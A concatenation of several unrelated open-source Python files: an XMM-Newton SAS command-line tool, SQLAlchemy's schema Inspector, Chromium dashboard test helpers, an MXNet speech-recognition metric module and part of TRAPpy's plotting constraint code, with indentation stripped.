expno = int(expno)
dtype = self.dtypemap[dtype.lower()]
ext = self.extmap[ext]
if expno > 0 and expno < 900:
expno = expseqs[instr][expno]
if ccdno == '00' and dtype != 'aux':
stem = '%s_%s.%s' % (instr, dtype, ext)
elif dtype == 'aux':
stem = '%s_e%03d_%s.%s' % (instr, expno, dtype, ext)
elif dtype == 'diagnostic':
stem = '%s_%s_e%03d_c%s.%s' % (instr, dtype, expno, ccdno, ext)
else:
stem = '%s_e%03d_c%s_%s.%s' % (instr, expno, ccdno, dtype, ext)
if stem in stems:
cli.die('short identifier clash: %r', stem)
stems.add(stem)
(destdir / stem).rellink_to(p)
class MakeSCAliases(multitool.Command):
name = 'make-sc-aliases'
argspec = '<srcdir> <destdir>'
summary = 'Generate user-friendly aliases to XMM-Newton spacecraft (SC) data files.'
more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''
INSTRUMENT = slice(16, 18)
EXPFLAG = slice(18, 19) # 'S': sched, 'U': unsched; 'X': N/A
EXPNO = slice(19, 22)
CCDNO = slice(22, 24)
DTYPE = slice(24, 27)
EXTENSION = slice(28, None)
extmap = {
'ASC': 'txt',
'FIT': 'fits',
'SAS': 'txt',
}
dtypemap = {
'ats': 'attitude',
'das': 'dummy_attitude',
'pos': 'pred_orbit',
'p1s': 'phk_hk1',
'p2s': 'phk_hk2',
'p3s': 'phk_att1',
'p4s': 'phk_att2',
'p5s': 'phk_sid0',
'p6s': 'phk_sid1',
'p7s': 'phk_sid4',
'p8s': 'phk_sid5',
'p9s': 'phk_sid6',
'ras': 'raw_attitude',
'ros': 'recon_orbit',
'sum': 'summary',
'tcs': 'raw_time_corr',
'tcx': 'recon_time_corr',
}
def invoke(self, args, **kwargs):
if len(args) != 2:
raise multitool.UsageError('make-sc-aliases requires exactly 2 arguments')
srcdir = Path(args[0])
destdir = Path(args[1])
srcfiles = [x for x in srcdir.iterdir() if len(x.name) > 28]
# Do it.
idents = set()
destdir.mkdir() # intentionally crash if exists; easiest approach
for p in srcfiles:
instr = p.name[self.INSTRUMENT]
if instr != 'SC':
continue
# none of these are actually useful for SC files:
#eflag = p.name[self.EXPFLAG]
#expno = p.name[self.EXPNO]
#ccdno = p.name[self.CCDNO]
dtype = p.name[self.DTYPE]
ext = p.name[self.EXTENSION]
# One conflict, easy to resolve
if dtype == 'SUM' and ext == 'ASC':
continue
dtype = self.dtypemap[dtype.lower()]
ext = self.extmap[ext]
ident = dtype
if ident in idents:
cli.die('short identifier clash: %r', ident)
idents.add(ident)
(destdir / (dtype + '.' + ext)).rellink_to(p)
class Shell(multitool.Command):
# XXX we hardcode bash! and we copy/paste from environments/__init__.py
name = 'shell'
argspec = '<manifest>'
summary = 'Start an interactive shell in the SAS environment.'
help_if_no_args = False
more_help = '''Due to the way SAS works, the path to a MANIFEST.nnnnn file in an ODF
directory must be specified, and all operations work on the specified data
set.'''
def invoke(self, args, **kwargs):
if len(args) != 1:
raise multitool.UsageError('shell expects exactly 1 argument')
env = SasEnvironment(args[0])
from tempfile import NamedTemporaryFile
with NamedTemporaryFile(delete=False, mode='wt') as f:
print('''[ -e ~/.bashrc ] && source ~/.bashrc
PS1="SAS(%s) $PS1"
rm %s''' % (env._obsid, f.name), file=f)
env.execvpe(['bash', '--rcfile', f.name, '-i'])
class UpdateCcf(multitool.Command):
name = 'update-ccf'
argspec = ''
summary = 'Update the SAS "current calibration files".'
more_help = 'This executes an rsync command to make sure the files are up-to-date.'
help_if_no_args = False
def invoke(self, args, **kwargs):
if len(args):
raise multitool.UsageError('update-ccf expects no arguments')
sasdir = os.environ.get('PWKIT_SAS')
if sasdir is None:
cli.die('environment variable $PWKIT_SAS must be set')
os.chdir(os.path.join(sasdir, 'ccf'))
os.execvp('rsync', ['rsync',
'-av',
'--delete',
'--delete-after',
'--force',
'--include=*.CCF',
'--exclude=*/',
'xmm.esac.esa.int::XMM_VALID_CCF',
'.'])
class SasTool(multitool.Multitool):
cli_name = 'pkenvtool sas'
summary = 'Run tools in the SAS environment.'
def commandline(argv):
from six import itervalues
tool = SasTool()
tool.populate(itervalues(globals()))
tool.commandline(argv)
| |
"""Provides an abstraction for obtaining database schema information.
Usage Notes:
Here are some general conventions when accessing the low level inspector
methods such as get_table_names, get_columns, etc.
1. Inspector methods return lists of dicts in most cases for the following
reasons:
* They're both standard types that can be serialized.
* Using a dict instead of a tuple allows easy expansion of attributes.
* Using a list for the outer structure maintains order and is easy to work
with (e.g. list comprehension [d['name'] for d in cols]).
2. Records that contain a name, such as the column name in a column record
use the key 'name'. So for most return values, each record will have a
'name' attribute..
"""
import sqlalchemy
from sqlalchemy import exc, sql
from sqlalchemy import util
from sqlalchemy.types import TypeEngine
from sqlalchemy import schema as sa_schema
@util.decorator
def cache(fn, self, con, *args, **kw):
info_cache = kw.get('info_cache', None)
if info_cache is None:
return fn(self, con, *args, **kw)
key = (
fn.__name__,
tuple(a for a in args if isinstance(a, basestring)),
tuple((k, v) for k, v in kw.iteritems() if isinstance(v, (basestring, int, float)))
)
ret = info_cache.get(key)
if ret is None:
ret = fn(self, con, *args, **kw)
info_cache[key] = ret
return ret
class Inspector(object):
"""Performs database schema inspection.
The Inspector acts as a proxy to the dialects' reflection methods and
provides higher level functions for accessing database schema information.
"""
def __init__(self, conn):
"""Initialize the instance.
:param conn: a :class:`~sqlalchemy.engine.base.Connectable`
"""
self.conn = conn
# set the engine
if hasattr(conn, 'engine'):
self.engine = conn.engine
else:
self.engine = conn
self.dialect = self.engine.dialect
self.info_cache = {}
@classmethod
def from_engine(cls, engine):
if hasattr(engine.dialect, 'inspector'):
return engine.dialect.inspector(engine)
return Inspector(engine)
@property
def default_schema_name(self):
return self.dialect.default_schema_name
def get_schema_names(self):
"""Return all schema names.
"""
if hasattr(self.dialect, 'get_schema_names'):
return self.dialect.get_schema_names(self.conn,
info_cache=self.info_cache)
return []
def get_table_names(self, schema=None, order_by=None):
"""Return all table names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
:param order_by: Optional, may be the string "foreign_key" to sort
the result on foreign key dependencies.
This should probably not return view names or maybe it should return
them with an indicator t or v.
"""
if hasattr(self.dialect, 'get_table_names'):
tnames = self.dialect.get_table_names(self.conn,
schema,
info_cache=self.info_cache)
else:
tnames = self.engine.table_names(schema)
if order_by == 'foreign_key':
ordered_tnames = tnames[:]
# Order based on foreign key dependencies.
for tname in tnames:
table_pos = tnames.index(tname)
fkeys = self.get_foreign_keys(tname, schema)
for fkey in fkeys:
rtable = fkey['referred_table']
if rtable in ordered_tnames:
ref_pos = ordered_tnames.index(rtable)
# Make sure it's lower in the list than anything it
# references.
if table_pos > ref_pos:
ordered_tnames.pop(table_pos) # rtable moves up 1
# insert just below rtable
ordered_tnames.index(ref_pos, tname)
tnames = ordered_tnames
return tnames
def get_table_options(self, table_name, schema=None, **kw):
if hasattr(self.dialect, 'get_table_options'):
return self.dialect.get_table_options(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return {}
def get_view_names(self, schema=None):
"""Return all view names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_names(self.conn, schema,
info_cache=self.info_cache)
def get_view_definition(self, view_name, schema=None):
"""Return definition for `view_name`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_definition(
self.conn, view_name, schema, info_cache=self.info_cache)
def get_columns(self, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a string `table_name` and an optional string `schema`, return
column information as a list of dicts with these keys:
name
the column's name
type
:class:`~sqlalchemy.types.TypeEngine`
nullable
boolean
default
the column's default value
attrs
dict containing optional column attributes
"""
col_defs = self.dialect.get_columns(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
for col_def in col_defs:
# make this easy and only return instances for coltype
coltype = col_def['type']
if not isinstance(coltype, TypeEngine):
col_def['type'] = coltype()
return col_defs
def get_primary_keys(self, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a list of column names.
"""
pkeys = self.dialect.get_primary_keys(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_foreign_keys(self, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
foreign key information as a list of dicts with these keys:
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
\**kw
other options passed to the dialect's get_foreign_keys() method.
"""
fk_defs = self.dialect.get_foreign_keys(self.conn, table_name, schema,
info_cache=self.info_cache,
**kw)
return fk_defs
def get_indexes(self, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a string `table_name` and an optional string `schema`, return
index information as a list of dicts with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
\**kw
other options passed to the dialect's get_indexes() method.
"""
indexes = self.dialect.get_indexes(self.conn, table_name,
schema,
info_cache=self.info_cache, **kw)
return indexes
def reflecttable(self, table, include_columns):
dialect = self.conn.dialect
# MySQL dialect does this. Applicable with other dialects?
if hasattr(dialect, '_connection_charset') \
and hasattr(dialect, '_adjust_casing'):
charset = dialect._connection_charset
dialect._adjust_casing(table)
# table attributes we might need.
reflection_options = dict(
(k, table.kwargs.get(k)) for k in dialect.reflection_options if k in table.kwargs)
schema = table.schema
table_name = table.name
# apply table options
tbl_opts = self.get_table_options(table_name, schema, **table.kwargs)
if tbl_opts:
table.kwargs.update(tbl_opts)
# table.kwargs will need to be passed to each reflection method. Make
# sure keywords are strings.
tblkw = table.kwargs.copy()
for (k, v) in tblkw.items():
del tblkw[k]
tblkw[str(k)] = v
# Py2K
if isinstance(schema, str):
schema = schema.decode(dialect.encoding)
if isinstance(table_name, str):
table_name = table_name.decode(dialect.encoding)
# end Py2K
# columns
found_table = False
for col_d in self.get_columns(table_name, schema, **tblkw):
found_table = True
name = col_d['name']
if include_columns and name not in include_columns:
continue
coltype = col_d['type']
col_kw = {
'nullable':col_d['nullable'],
}
if 'autoincrement' in col_d:
col_kw['autoincrement'] = col_d['autoincrement']
if 'quote' in col_d:
col_kw['quote'] = col_d['quote']
colargs = []
if col_d.get('default') is not None:
# the "default" value is assumed to be a literal SQL expression,
# so is wrapped in text() so that no quoting occurs on re-issuance.
colargs.append(sa_schema.DefaultClause(sql.text(col_d['default'])))
if 'sequence' in col_d:
# TODO: mssql, maxdb and sybase are using this.
seq = col_d['sequence']
sequence = sa_schema.Sequence(seq['name'], 1, 1)
if 'start' in seq:
sequence.start = seq['start']
if 'increment' in seq:
sequence.increment = seq['increment']
colargs.append(sequence)
col = sa_schema.Column(name, coltype, *colargs, **col_kw)
table.append_column(col)
if not found_table:
raise exc.NoSuchTableError(table.name)
# Primary keys
primary_key_constraint = sa_schema.PrimaryKeyConstraint(*[
table.c[pk] for pk in self.get_primary_keys(table_name, schema, **tblkw)
if pk in table.c
])
table.append_constraint(primary_key_constraint)
# Foreign keys
fkeys = self.get_foreign_keys(table_name, schema, **tblkw)
for fkey_d in fkeys:
conname = fkey_d['name']
constrained_columns = fkey_d['constrained_columns']
referred_schema = fkey_d['referred_schema']
referred_table = fkey_d['referred_table']
referred_columns = fkey_d['referred_columns']
refspec = []
if referred_schema is not None:
sa_schema.Table(referred_table, table.metadata,
autoload=True, schema=referred_schema,
autoload_with=self.conn,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join(
[referred_schema, referred_table, column]))
else:
sa_schema.Table(referred_table, table.metadata, autoload=True,
autoload_with=self.conn,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join([referred_table, column]))
table.append_constraint(
sa_schema.ForeignKeyConstraint(constrained_columns, refspec,
conname, link_to_name=True))
# Indexes
indexes = self.get_indexes(table_name, schema)
for index_d in indexes:
name = index_d['name']
columns = index_d['column_names']
unique = index_d['unique']
flavor = index_d.get('type', 'unknown type')
if include_columns and \
not set(columns).issubset(include_columns):
util.warn(
"Omitting %s KEY for (%s), key covers omitted columns." %
(flavor, ', '.join(columns)))
continue
sa_schema.Index(name, *[table.columns[c] for c in columns],
**dict(unique=unique))
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper functions used in multiple unit tests."""
import base64
import json
import mock
import os
import re
import unittest
import urllib
from google.appengine.api import users
from google.appengine.ext import deferred
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from dashboard.common import stored_object
from dashboard.common import utils
from dashboard.models import graph_data
from dashboard.services import rietveld_service
_QUEUE_YAML_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
class FakeRequestObject(object):
"""Fake Request object which can be used by datastore_hooks mocks."""
def __init__(self, remote_addr=None):
self.registry = {}
self.remote_addr = remote_addr
class FakeResponseObject(object):
"""Fake Response Object which can be returned by urlfetch mocks."""
def __init__(self, status_code, content):
self.status_code = status_code
self.content = content
class TestCase(unittest.TestCase):
"""Common base class for test cases."""
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_mail_stub()
self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)
self.testbed.init_memcache_stub()
ndb.get_context().clear_cache()
self.testbed.init_taskqueue_stub(root_path=_QUEUE_YAML_DIR)
self.testbed.init_user_stub()
self.testbed.init_urlfetch_stub()
self.mock_get_request = None
self._PatchIsInternalUser()
def tearDown(self):
self.testbed.deactivate()
def _AddFakeRietveldConfig(self):
"""Sets up fake service account credentials for tests."""
rietveld_service.RietveldConfig(
id='default_rietveld_config',
client_email='foo@bar.com',
service_account_key='Fake Account Key',
server_url='https://test-rietveld.appspot.com',
internal_server_url='https://test-rietveld.appspot.com').put()
def ExecuteTaskQueueTasks(self, handler_name, task_queue_name):
"""Executes all of the tasks on the queue until there are none left."""
tasks = self.GetTaskQueueTasks(task_queue_name)
task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
task_queue.FlushQueue(task_queue_name)
for task in tasks:
self.testapp.post(
handler_name, urllib.unquote_plus(base64.b64decode(task['body'])))
self.ExecuteTaskQueueTasks(handler_name, task_queue_name)
def ExecuteDeferredTasks(self, task_queue_name):
task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
tasks = task_queue.GetTasks(task_queue_name)
task_queue.FlushQueue(task_queue_name)
for task in tasks:
deferred.run(base64.b64decode(task['body']))
self.ExecuteDeferredTasks(task_queue_name)
def GetTaskQueueTasks(self, task_queue_name):
task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
return task_queue.GetTasks(task_queue_name)
def SetCurrentUser(self, email, user_id='123456', is_admin=False):
"""Sets the user in the environment in the current testbed."""
self.testbed.setup_env(
user_is_admin=('1' if is_admin else '0'),
user_email=email,
user_id=user_id,
overwrite=True)
def UnsetCurrentUser(self):
"""Sets the user in the environment to have no email and be non-admin."""
self.testbed.setup_env(
user_is_admin='0', user_email='', user_id='', overwrite=True)
def GetEmbeddedVariable(self, response, var_name):
"""Gets a variable embedded in a script element in a response.
If the variable was found but couldn't be parsed as JSON, this method
has a side-effect of failing the test.
Args:
response: A webtest.TestResponse object.
var_name: The name of the variable to fetch the value of.
Returns:
A value obtained from de-JSON-ifying the embedded variable,
or None if no such value could be found in the response.
"""
scripts_elements = response.html('script')
for script_element in scripts_elements:
contents = script_element.renderContents()
# Assume that the variable is all one line, with no line breaks.
match = re.search(var_name + r'\s*=\s*(.+);\s*$', contents,
re.MULTILINE)
if match:
javascript_value = match.group(1)
try:
return json.loads(javascript_value)
except ValueError:
self.fail('Could not deserialize value of "%s" as JSON:\n%s' %
(var_name, javascript_value))
return None
return None
def GetJsonValue(self, response, key):
return json.loads(response.body).get(key)
def PatchDatastoreHooksRequest(self, remote_addr=None):
"""This patches the request object to allow IP address to be set.
It should be used by tests which check code that does IP address checking
through datastore_hooks.
"""
get_request_patcher = mock.patch(
'webapp2.get_request',
mock.MagicMock(return_value=FakeRequestObject(remote_addr)))
self.mock_get_request = get_request_patcher.start()
self.addCleanup(get_request_patcher.stop)
def _PatchIsInternalUser(self):
"""Sets up a fake version of utils.IsInternalUser to use in tests.
This version doesn't try to make any requests to check whether the
user is internal; it just checks for cached values and returns False
if nothing is found.
"""
def IsInternalUser():
username = users.get_current_user()
return bool(utils.GetCachedIsInternalUser(username))
is_internal_user_patcher = mock.patch.object(
utils, 'IsInternalUser', IsInternalUser)
is_internal_user_patcher.start()
self.addCleanup(is_internal_user_patcher.stop)
def AddTests(masters, bots, tests_dict):
"""Adds data to the mock datastore.
Args:
masters: List of buildbot master names.
bots: List of bot names.
tests_dict: Nested dictionary of tests to add; keys are test names
and values are nested dictionaries of tests to add.
"""
for master_name in masters:
master_key = graph_data.Master(id=master_name).put()
for bot_name in bots:
graph_data.Bot(id=bot_name, parent=master_key).put()
for test_name in tests_dict:
test_path = '%s/%s/%s' % (master_name, bot_name, test_name)
graph_data.TestMetadata(id=test_path).put()
_AddSubtest(test_path, tests_dict[test_name])
def _AddSubtest(parent_test_path, subtests_dict):
"""Helper function to recursively add sub-TestMetadatas to a TestMetadata.
Args:
parent_test_path: A path to the parent test.
subtests_dict: A dict of test names to dictionaries of subtests.
"""
for test_name in subtests_dict:
test_path = '%s/%s' % (parent_test_path, test_name)
graph_data.TestMetadata(id=test_path).put()
_AddSubtest(test_path, subtests_dict[test_name])
def AddRows(test_path, rows):
"""Adds Rows to a given test.
Args:
test_path: Full test path of TestMetadata entity to add Rows to.
rows: Either a dict mapping ID (revision) to properties, or a set of IDs.
Returns:
The list of Row entities which have been put, in order by ID.
"""
test_key = utils.TestKey(test_path)
container_key = utils.GetTestContainerKey(test_key)
if isinstance(rows, dict):
return _AddRowsFromDict(container_key, rows)
return _AddRowsFromIterable(container_key, rows)
def _AddRowsFromDict(container_key, row_dict):
"""Adds a set of Rows given a dict of revisions to properties."""
rows = []
for int_id in sorted(row_dict):
rows.append(
graph_data.Row(id=int_id, parent=container_key, **row_dict[int_id]))
ndb.put_multi(rows)
return rows
def _AddRowsFromIterable(container_key, row_ids):
"""Adds a set of Rows given an iterable of ID numbers."""
rows = []
for int_id in sorted(row_ids):
rows.append(graph_data.Row(id=int_id, parent=container_key, value=int_id))
ndb.put_multi(rows)
return rows
def SetIsInternalUser(user, is_internal_user):
"""Sets the domain that users who can access internal data belong to."""
utils.SetCachedIsInternalUser(user, is_internal_user)
def SetSheriffDomains(domains):
"""Sets the domain that users who can access internal data belong to."""
stored_object.Set(utils.SHERIFF_DOMAINS_KEY, domains)
def SetIpWhitelist(ip_addresses):
"""Sets the list of whitelisted IP addresses."""
stored_object.Set(utils.IP_WHITELIST_KEY, ip_addresses)
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import numpy as np
from label_util import LabelUtil
from log_util import LogUtil
def check_label_shapes(labels, preds, shape=0):
"""Check to see if the two arrays are the same size."""
if shape == 0:
label_shape, pred_shape = len(labels), len(preds)
else:
label_shape, pred_shape = labels.shape, preds.shape
if label_shape != pred_shape:
raise ValueError("Shape of labels {} does not match shape of "
"predictions {}".format(label_shape, pred_shape))
class STTMetric(mx.metric.EvalMetric):
def __init__(self, batch_size, num_gpu, is_epoch_end=False, is_logging=True):
super(STTMetric, self).__init__('STTMetric')
self.batch_size = batch_size
self.num_gpu = num_gpu
self.total_n_label = 0
self.total_l_dist = 0
self.is_epoch_end = is_epoch_end
self.total_ctc_loss = 0.
self.batch_loss = 0.
self.is_logging = is_logging
def update(self, labels, preds):
check_label_shapes(labels, preds)
if self.is_logging:
log = LogUtil().getlogger()
labelUtil = LabelUtil.getInstance()
self.batch_loss = 0.
for label, pred in zip(labels, preds):
label = label.asnumpy()
pred = pred.asnumpy()
seq_length = len(pred) / int(int(self.batch_size) / int(self.num_gpu))
for i in range(int(int(self.batch_size) / int(self.num_gpu))):
l = remove_blank(label[i])
p = []
for k in range(int(seq_length)):
p.append(np.argmax(pred[k * int(int(self.batch_size) / int(self.num_gpu)) + i]))
p = pred_best(p)
l_distance = levenshtein_distance(l, p)
self.total_n_label += len(l)
self.total_l_dist += l_distance
this_cer = float(l_distance) / float(len(l))
if self.is_logging:
log.info("label: %s " % (labelUtil.convert_num_to_word(l)))
log.info("pred : %s , cer: %f (distance: %d/ label length: %d)" % (
labelUtil.convert_num_to_word(p), this_cer, l_distance, len(l)))
self.num_inst += 1
self.sum_metric += this_cer
if self.is_epoch_end:
loss = ctc_loss(l, pred, i, int(seq_length), int(self.batch_size), int(self.num_gpu))
self.batch_loss += loss
if self.is_logging:
log.info("loss: %f " % loss)
self.total_ctc_loss += self.batch_loss
def get_batch_loss(self):
return self.batch_loss
def get_name_value(self):
try:
total_cer = float(self.total_l_dist) / float(self.total_n_label)
except ZeroDivisionError:
total_cer = float('inf')
return total_cer, self.total_n_label, self.total_l_dist, self.total_ctc_loss
def reset(self):
self.total_n_label = 0
self.total_l_dist = 0
self.num_inst = 0
self.sum_metric = 0.0
self.total_ctc_loss = 0.0
def pred_best(p):
ret = []
p1 = [0] + p
for i in range(len(p)):
c1 = p1[i]
c2 = p1[i + 1]
if c2 == 0 or c2 == c1:
continue
ret.append(c2)
return ret
def remove_blank(l):
ret = []
for i in range(l.size):
if l[i] == 0:
break
ret.append(l[i])
return ret
def remove_space(l):
labelUtil = LabelUtil.getInstance()
ret = []
for i in range(len(l)):
if l[i] != labelUtil.get_space_index():
ret.append(l[i])
return ret
def ctc_loss(label, prob, remainder, seq_length, batch_size, num_gpu=1, big_num=1e10):
label_ = [0, 0]
prob[prob < 1 / big_num] = 1 / big_num
log_prob = np.log(prob)
l = len(label)
for i in range(l):
label_.append(int(label[i]))
label_.append(0)
l_ = 2 * l + 1
a = np.full((seq_length, l_ + 1), -big_num)
a[0][1] = log_prob[remainder][0]
a[0][2] = log_prob[remainder][label_[2]]
for i in range(1, seq_length):
row = i * int(batch_size / num_gpu) + remainder
a[i][1] = a[i - 1][1] + log_prob[row][0]
a[i][2] = np.logaddexp(a[i - 1][2], a[i - 1][1]) + log_prob[row][label_[2]]
for j in range(3, l_ + 1):
a[i][j] = np.logaddexp(a[i - 1][j], a[i - 1][j - 1])
if label_[j] != 0 and label_[j] != label_[j - 2]:
a[i][j] = np.logaddexp(a[i][j], a[i - 1][j - 2])
a[i][j] += log_prob[row][label_[j]]
return -np.logaddexp(a[seq_length - 1][l_], a[seq_length - 1][l_ - 1])
# label is done with remove_blank
# pred is got from pred_best
def levenshtein_distance(label, pred):
n_label = len(label) + 1
n_pred = len(pred) + 1
if (label == pred):
return 0
if (len(label) == 0):
return len(pred)
if (len(pred) == 0):
return len(label)
v0 = [i for i in range(n_label)]
v1 = [0 for i in range(n_label)]
for i in range(len(pred)):
v1[0] = i + 1
for j in range(len(label)):
cost = 0 if label[j] == pred[i] else 1
v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
for j in range(n_label):
v0[j] = v1[j]
return v1[len(label)]
def char_match_1way(char_label, char_pred, criteria, n_whole_label):
n_label = len(char_label)
n_pred = len(char_pred)
pred_pos = 0
accuracy = 0.
next_accu = 0.
n_matched = 0.
next_n_matched = 0.
for i_index in range(n_label):
tail_label = n_label - 1 - i_index
c_label = char_label[i_index]
for j_index in range(pred_pos, n_pred):
tail_pred = n_pred - 1 - j_index
c_pred = char_pred[j_index]
if tail_label < tail_pred * criteria or tail_pred < tail_label * criteria:
break
if c_label == c_pred:
n_matched += 1.0
pred_pos = j_index + 1
break
accuracy = n_matched / n_whole_label
if n_label > 0.7 * n_whole_label:
next_label = char_label[1:]
next_accu, next_n_matched = char_match_1way(next_label, char_pred, criteria, n_whole_label)
if next_accu > accuracy:
accuracy = next_accu
n_matched = next_n_matched
return accuracy, n_matched
def char_match_2way(label, pred):
criterias = [0.98, 0.96, 0.93, 0.9, 0.85, 0.8, 0.7]
r_pred = pred[::-1]
r_label = label[::-1]
n_whole_label = len(remove_space(label))
val1_max = 0.
val2_max = 0.
val1_max_matched = 0.
val2_max_matched = 0.
for criteria in criterias:
val1, val1_matched = char_match_1way(label, pred, criteria, n_whole_label)
val2, val2_matched = char_match_1way(r_label, r_pred, criteria, n_whole_label)
if val1 > val1_max:
val1_max = val1
val1_max_matched = val1_matched
if val2 > val2_max:
val2_max = val2
val2_max_matched = val2_matched
val = val1_max if val1_max > val2_max else val2_max
val_matched = val1_max_matched if val1_max > val2_max else val2_max_matched
return val, val_matched, n_whole_label
| |
# Copyright 2015-2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This module provides the Constraint class for handling
filters and pivots in a modular fashion. This enable easy
constraint application.
An implementation of :mod:`trappy.plotter.AbstractDataPlotter`
is expected to use the :mod:`trappy.plotter.Constraint.ConstraintManager`
class to pivot and filter data and handle multiple column,
trace and event inputs.
The underlying object that encapsulates a unique set of
a data column, data event and the requisite filters is
:mod:`trappy.plotter.Constraint.Constraint`
"""
# pylint: disable=R0913
from trappy.plotter.Utils import decolonize, normalize_list
from trappy.utils import listify
from trappy.plotter import AttrConf
from trappy.utils import handle_duplicate_index
class Constraint(object):
"""
What is a Constraint?
It is collection of data based on two rules:
- A Pivot
- A Set of Filters
- A Data Column
For Example a :mod:`pandas.DataFrame`
===== ======== =========
Time CPU Latency
===== ======== =========
1 x <val>
2 y <val>
3 z <val>
4 a <val>
===== ======== =========
The resultant data will be split for each unique pivot value
with the filters applied
::
result["x"] = pd.Series.filtered()
result["y"] = pd.Series.filtered()
result["z"] = pd.Series.filtered()
result["a"] = pd.Series.filtered()
:param trappy_trace: Input Data
:type trappy_trace: :mod:`pandas.DataFrame`, :mod:`trappy.trace.FTrace`
:param column: The data column
:type column: str
:param template: TRAPpy Event
:type template: :mod:`trappy.base.Base` event
:param trace_index: The index of the trace/data in the overall constraint
data
:type trace_index: int
:param filters: A dictionary of filter values
:type filters: dict
"""
def __init__(self, trappy_trace, pivot, column, template, trace_index,
filters):
self._trappy_trace = trappy_trace
self._filters = filters
self._pivot = pivot
self.column = column
self._template = template
self._dup_resolved = False
self._data = self.populate_data_frame()
try:
self.result = self._apply()
except ValueError:
if not self._dup_resolved:
self._handle_duplicate_index()
try:
self.result = self._apply()
except:
raise ValueError("Unable to handle duplicates")
self.trace_index = trace_index
def _apply(self):
"""This method applies the filter on the resultant data
on the input column.
"""
data = self._data
result = {}
try:
values = data[self.column]
except KeyError:
return result
if self._pivot == AttrConf.PIVOT:
pivot_vals = [AttrConf.PIVOT_VAL]
else:
pivot_vals = self.pivot_vals(data)
for pivot_val in pivot_vals:
criterion = values.map(lambda x: True)
for key in self._filters.keys():
if key != self._pivot and key in data.columns:
criterion = criterion & data[key].map(
lambda x: x in self._filters[key])
if pivot_val != AttrConf.PIVOT_VAL:
criterion &= data[self._pivot] == pivot_val
val_series = values[criterion]
if len(val_series) != 0:
result[pivot_val] = val_series
return result
def _handle_duplicate_index(self):
"""Handle duplicate values in index"""
self._data = handle_duplicate_index(self._data)
self._dup_resolved = True
def _uses_trappy_trace(self):
if not self._template:
return False
else:
return True
def populate_data_frame(self):
"""Return the populated :mod:`pandas.DataFrame`"""
if not self._uses_trappy_trace():
return self._trappy_trace
data_container = getattr(
self._trappy_trace,
decolonize(self._template.name))
return data_container.data_frame
def pivot_vals(self, data):
"""This method returns the unique pivot values for the
Constraint's pivot and the column
:param data: Input Data
:type data: :mod:`pandas.DataFrame`
"""
if self._pivot == AttrConf.PIVOT:
return AttrConf.PIVOT_VAL
if self._pivot not in data.columns:
return []
pivot_vals = set(data[self._pivot])
if self._pivot in self._filters:
pivot_vals = pivot_vals & set(self._filters[self._pivot])
return list(pivot_vals)
def __str__(self):
name = self.get_data_name()
if not self._uses_trappy_trace():
return name + ":" + self.column
return name + ":" + \
self._template.name + ":" + self.column
def get_data_name(self):
"""Get name for the data member. This method
relies on the "name" attribute for the name.
If the name attribute is absent, it associates
a numeric name to the respective data element
:returns: The name of the data member
"""
if self._uses_trappy_trace():
if self._trappy_trace.name != "":
return self._trappy_trace.name
else:
return "Trace {}".format(self.trace_index)
else:
return "DataFrame {}".format(self.trace_index)
class ConstraintManager(object):
"""A class responsible for converting inputs
to constraints and also ensuring sanity
:param traces: Input Trace data
:type traces: :mod:`trappy.trace.FTrace`, list(:mod:`trappy.trace.FTrace`)
:param columns: The column values from the corresponding
:mod:`pandas.DataFrame`
:type columns: str, list(str)
:param pivot: The column around which the data will be
pivoted:
:type pivot: str
:param filters: A dictionary of values to be applied on the
respective columns
:type filters: dict
:param zip_constraints: Permutes the columns and traces instead
of a one-to-one correspondence
:type zip_constraints: bool
"""
def __init__(self, traces, columns, templates, pivot, filters,
zip_constraints=True):
self._ip_vec = []
self._ip_vec.append(listify(traces))
self._ip_vec.append(listify(columns))
self._ip_vec.append(listify(templates))
self._lens = map(len, self._ip_vec)
